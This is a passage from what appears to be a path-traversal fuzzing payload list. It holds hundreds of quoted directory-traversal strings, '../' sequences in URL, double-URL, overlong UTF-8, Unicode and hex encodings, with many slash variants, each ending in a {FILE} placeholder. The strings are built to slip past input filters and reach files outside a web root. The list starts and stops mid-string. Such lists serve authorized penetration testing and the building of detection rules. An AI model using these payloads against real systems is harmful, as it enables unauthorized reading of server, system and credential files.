55c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","../{FILE}","../../{FILE}","../../../{FILE}","../../../../{FILE}","../../../../../{FILE}","../../../../../../{FILE}","../../../../../../../{FILE}","../../../../../../../../{FILE}","..%2f{FILE}","..%2f..%2f{FILE}","..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}","%2e%2e/{FILE}","%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}","%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","..%252f{FILE}","..%252f..%252f{FILE}","..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}","%252e%252e/{FILE}","%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}","%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}","..\\{FILE}","..\\..\\{FILE}","..\\..\\..\\{FILE}","..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\{FILE}","..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%5c{FILE}","..%5c..%5c{FILE}","..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}","%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}","%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","..%255c{FILE}","..%255c..%255c{FILE}","..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}","%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}","%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}","\\../{FILE}","\\../\\../{FILE}","\\../\\../\\../{FILE}","\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../\\../\\../{FILE}","\\../\\../\\../\\../\\../\\../\\../\\../{FILE}","/..\\{FILE}","/..\\/..\\{FILE}","/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}","/..\\/..\\/..\\/..\\/..\\/..\\/..\\/..\\{FILE}",".../{FILE}",".../.../{FILE}",".../.../.../{FILE}",".../.../.../.../{FILE}",".../.../.../.../.../{FILE}",".../.../.../.../.../.../{FILE}",".../.../.../.../.../.../.../{FILE}",".../.../.../.../.../.../.../.../{FILE}","...\\{FILE}","...\\...\\{FILE}","...\\...\\...\\{FILE}","...\\...\\...\\...\\{FILE}","...\\...\\...\\...\\...\\{FILE}","...\\...\\...\\...\\...\\...\\{FILE}","...\\...\\...\\...\\...\\...\\...\\{FILE}","...\\...\\...\\...\\...\\...\\...\\...\\{FILE}","..../{FILE}","..../..../{FILE}","..../..../..../{FILE}","..../..../..../..../{FILE}","..../..../..../..../..../{FILE}","..../..../..../..../..../..../{FILE}","..../..../..../..../..../..../..../{FILE}","..../..../..../..../..../..../..../..../{FILE}","....\\{FILE}","....\\....\\{FILE}","....\\....\\....\\{FILE}","....\\....\\....\\....\\{FILE}","....\\....\\....\\....\\....\\{FILE}","....\\....\\....\\....\\....\\....\\{FILE}","....\\....\\....\\....\\....\\....\\....\\{FILE}","....\\....\\....\\....\\....\\....\\....\\....\\{FILE}","........................................................................../{FILE}","........................................................................../../{FILE}","........................................................................../../../{FILE}","........................................................................../../../../{FILE}","........................................................................../../../../../{FILE}","........................................................................../../../../../../{FILE}","........................................................................../../../../../../../{FILE}","........................................................................../../../../../../../../{FILE}","..........................................................................\\{FILE}","..........................................................................\\..\\{FILE}","..........................................................................\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\..\\..\\..\\{FILE}","..........................................................................\\..\\..\\..\\..\\..\\..\\..\\{FILE}","..%u2215{FILE}","..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}","..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}","%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}","%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}","..%u2216{FILE}","..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}","..%uEFC8{FILE}","..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}","..%uF025{FILE}","..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}","%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","..0x2f{FILE}","..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","..0x5c{FILE}","..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","..%c0%2f{FILE}","..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","..%c0%5c{FILE}","..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","///%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","\\\\\\%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","..//{FILE}","..//..//{FILE}","..//..//..//{FILE}","..//..//..//..//{FILE}","..//..//..//..//..//{FILE}","..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//..//{FILE}","..///{FILE}","..///..///{FILE}","..///..///..///{FILE}","..///..///..///..///{FILE}","..///..///..///..///..///{FILE}","..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///..///{FILE}","..\\\\{FILE}","..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\\\{FILE}","..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","